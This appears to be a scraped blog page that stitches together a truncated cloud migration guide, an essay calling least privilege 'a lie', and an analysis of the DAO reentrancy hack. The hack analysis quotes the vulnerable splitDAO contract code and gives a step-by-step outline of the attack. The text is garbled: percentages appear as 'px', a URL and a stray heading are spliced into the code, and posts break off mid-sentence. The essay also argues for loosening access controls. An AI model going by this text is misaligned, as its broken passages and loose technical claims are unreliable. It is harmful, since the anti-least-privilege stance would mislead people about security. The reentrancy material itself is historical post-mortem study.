Start the biggest training campaign you possibly can – make this your crusade. Train everyone; business, finance, security, infrastructure – you name it, you train it. Don’t limit what anyone can train on, training is cheap – feast as much as you can. Look at Udemy, ACloudGuru, Youtube, WhizLabs etc etc etc. If you get this wrong then you will find your organisation fills up with expensive consultants and bespoke migration products that you don’t need ++ can easily do yourself, via opensource or with your cloud provider toolsets. In fact I would go one step further – if your not prepared to learn about the cloud, your not ready to go there.

Step 3: The OS Build

When you do start your cloud migration and begin to review your base OS images – go right back to the very beginning, remove every single product in all of these base builds. Look at what you can get out the box from your cloud provider and really push yourself hard on what do I really need vs nice to have. But the trick is that to get the real benefit from a cloud migration, you have to start by making your builds as “naked” as possible. Nothing should move into the base build without a good reason. Ownership and report lines are not a good enough reason for someones special “tool” to make it into the build. This process, if done correctly, should deliver you between 20-40px of your cloud migration savings. Do this badly and your costs, complexity and support will all head in the wrong direction.

Security HAS to be a first class citizen of your new world. In most organizations this will likely make for some awkward cultural collisions (control and ownership vs agility) and some difficult dialogs. The cloud, by definition, should be liberating – so how do you secure it without creating a “cloud bunker” that nobody can actually use? More on this later… 🙂

Step 4: Hybrid Networking

For any organisation with data centers – make no mistake, if you get this wrong its over before it starts.

0
0

The Least Privileged Lie

In technology, there is a tendency to solve a problem badly by using gross simplification, then come up with a catchy one liner and then broadcast this as doctrine or a principle. Nothing ticks more boxes in this regard, than the principle of least privileges. The ensuing enterprise scale deadlocks created by a crippling implementation of least privileges, is almost certainly lost on its evangelists. This blog will try to put an end to the slavish efforts of many security teams that are trying to ration out micro permissions and hope the digital revolution can fit into some break glass approval process.

What is this “Least Privileged” thing? Why does it exist? What are the alternatives? Wikipedia gives you a good overview of this here. The first line contains an obvious and glaring issue: “The principle means giving a user account or process only those privileges which are essential to perform its intended function”. Here the principle is being applied equally to users and processes/code. The principle also states only give privileges that are essential. What this principle is trying to say, is that we should treat human beings and code as the same thing and that we should only give humans “essential” permissions. Firstly, who on earth figures out what that bar for essential is and how do they ascertain what is and what is not essential? Do you really need to use storage? Do you really need an API? If I give you an API, do you need Puts and Gets?

Human beings are NOT deterministic. If I have a team of humans that can operate under the principle of least privileges then I don’t need them in the first place. I can simply replace them with some AI/RPA. Imagine the brutal pain of a break glass activity every time someone needed to do something “unexpected”. “Hi boss, I need to use the bathroom on the 1st floor – can you approve this? <Gulp> Boss you took too long… I no longer need your approval!”. Applying least privileges to code would seem to make some sense; BUT only if you never updated the code and if did update the code you need to make sure you have 100px test coverage.

So why did some bright spark want to duck tape the world to such a brittle pain yielding principle? At the heart of this are three issues. Identity, Immutability, and Trust. If there are other ways to solve these issues then we don’t need to pain and risks of trying to implement something that will never actually work, creates friction and critically creates a false sense of security. Least Privileges will never save anyone, you will just be told that if you could have performed this security miracle then you would have been fine. But you cannot and so you are not.

Whats interesting to me is that the least privileged lie is so widely ignored. For example, just think about how we implement user access. If we truly believed in least privileges then every user would have a unique set of privileges assigned to them. Instead, because we acknowledge this is burdensome we approximate the privileges that a user will need using policies which we attach to groups. The moment we add a user to one of these groups, we are approximating their required privileges and start to become overly permissive.

Lets be clear with each other, anyone trying to implement least privileges is living a lie. The extent of the lie normally only becomes clear after the event. So this blog post is designed to re-point energy towards sustainable alternatives that work, and additionally remove the need for the myriad of micro permissive handbrakes (that routinely get switched off to debug outages and issues).

Who are you?

This is the biggest issue and still remains the largest risk in technology today. If I don’t know who you are then I really really want to limit what you can do. Experiencing a root/super user account take over, is a doomsday scenario for any organisation. So lets limit the blast zone of these accounts right?

This applies equally to code and humans. For code this problem has been solved a long time ago, and if you look

Is this really my code?

0
0

The DAO Ethereum Recursion Bug: El Gordo!

If you found my article, I would consider it a reasonable assumption that you already understand the importance of this

Brief Introduction

The splitDAO function was created in order for some members of the DAO to separate themselves and their tokens from the main DAO, creating a new ‘child DAO’, for example in case they found themselves in disagreement with the majority.

The child DAO goes through the same 27 day creation period as the original DAO. Pre-requisite steps in order to call a splitDAO function are the creation of a new proposal on the original DAO and designation of a curator for the child DAO.

The child DAO created by the attacker has been referred as ‘darkDAO’ on reddit and the name seems to have stuck. The proposal and split process necessary for the attack was initiated at least 7 days prior to the incident.

The exploit one alone would have been economically unviable (attacker would have needed to put up 1/20th of the stolen amount upfront in the original DAO) and the second one alone would have been time intensive because normally only one splitDAO call could be done per transaction.

One way to see this is that the attacker performed a fraud, or a theft. Another way, more interesting for its implications, is that the attacker took the contract literally and followed the rule of code.

In their (allegedly) own words:

@stevecalifornia on Hacker News – https://news.ycombinator.com/item?id=11926150

“DAO, I closely read your contract and agreed to execute the clause where I can withdraw eth repeatedly and only be charged for my initial withdraw.

Thank you for the $70 million. Let me know if you draw up any other contracts I can participate in.

Regards, 0x304a554a310c7e546dfe434669c62820b7d83490″

The HACK

An “attacker” managed to combine two “exploits” in the DAO.

1) The attacker called the splitDAO function recursively (up to 20 times).

2) To make the attack more efficient, the attacker also managed to replicate the incident from the same two addresses (using the same tokens over and over again (approx 250 times).

Quote from “Luigi Renna”: To put this instance in a natural language perspective the Attacker requested the DAO “I want to withdraw all my tokens, and before that I want to withdraw all my tokens, and before that I want to… etc.” And be charged only once.

The Code That was Hacked

Below is the now infamous SplitDAO function in all its glory:

function splitDAO(
uint _proposalID,
address _newCurator
) noEther onlyTokenholders returns (bool _success) {
...
// Get the ether to be moved. Notice that this is done first!
uint fundsToBeMoved =
(balances[msg.sender] * p.splitData[0].splitBalance) /
p.splitData[0].totalSupply;
if (p.splitData[0].newDAO.createTokenProxy.value(fundsToBeMoved)(msg.sender) == false) // << This is
the line the attacker wants to run more than once
throw;
...
// Burn DAO Tokens
Transfer(msg.sender, 0, balances[msg.sender]);
withdrawRewardFor(msg.sender); // be nice, and get his rewards
// XXXXX Notice the preceding line is critically before the next few
•http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/ Question: So what about Blockchain/DLs?
totalSupply -= balances[msg.sender]; // THIS IS DONE LAST
balances[msg.sender] = 0; // THIS IS DONE LAST TOO
paidOut[msg.sender] = 0;
return true;
}

The basic idea behind the hack was:

1) Propose a split.
2) Execute the split.
3) When the DAO goes to withdraw your reward, call the function to execute a split before that withdrawal
finishes (ie recursion).
4) The function will start running again without updating your balance!!!
5) The line we marked above as “This is the line the attacker wants to run more than once“ will run more
than once!

Thoughts on the Hack

The code is easy to fix, you can just simply zero the balances immediately after calculating the fundsToBeMoved. But this bug is not the real issue for me – the main problem can be split into two areas:

  1. Ethereum is a Turing complete language with a stack/heap, exceptions and recursion. This means that even with the best intentions, we will create a vast number of routes through the code base to allow similar recursion and other bugs to be exposed. The only barrier really is how much ether it will cost to expose the bugs.
  2. There is no Escape Hatch for “bad” contracts. Emin Gun Sirer wrote a great article on this here: Escape hatches for smart contracts

Whilst a lot of focus is going in 2) – I believe that more focus needs to be put into making the language “safer”. For me, this would involve basic changes like:

  1. Blocking recursion. Blocking recursion at compile and runtime would be a big step forward. I struggle to see a downside to this, as in general recursion doesn’t scale, is slow and can always be replaced with iteration. Replace Recursion with Iteration
  2. Sandbox parameterisation. Currently there are no sandbox parameters to sit the contracts in. This means contracts the economic impact of these contracts are more empirical than deterministic. If you could abstract core parameters of the contract like the amount, wallet addresses etc etc and place these key values in an immutable wrapper than unwanted outcomes would be harder to achieve.
  3. Transactionality. Currently there in no obvious mechanism to peform economic functions wraped in an ATOMIC transaction. This ability would mean that economic values could be copied from the heap to the stack and moved as desired; but critically recursive calls could no revist the heap to essentially “duplicate” the value. It would also mean that if a benign fault occured the execution of the contract would be idempotent. Obviously blocking recursive calls goes some way towards this; but adding transactionality would be a material improvement.

I have other ideas including segregation of duties using API layers between core and contract code – but am still getting my head around Ethereum’s architecture.

0
0